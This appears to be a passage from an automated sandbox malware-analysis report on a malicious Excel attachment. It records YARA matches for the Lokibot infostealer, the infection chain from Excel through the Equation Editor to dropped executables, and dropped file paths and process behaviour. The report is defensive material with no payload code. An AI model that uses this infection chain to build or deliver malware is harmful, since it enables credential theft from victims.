              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040604C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404772
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001209FB
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040549C
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_004029D4
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 008AFF50 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmtxpy.exe DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and write
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFF95 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFF95 push ecx; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\xmtxpy.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
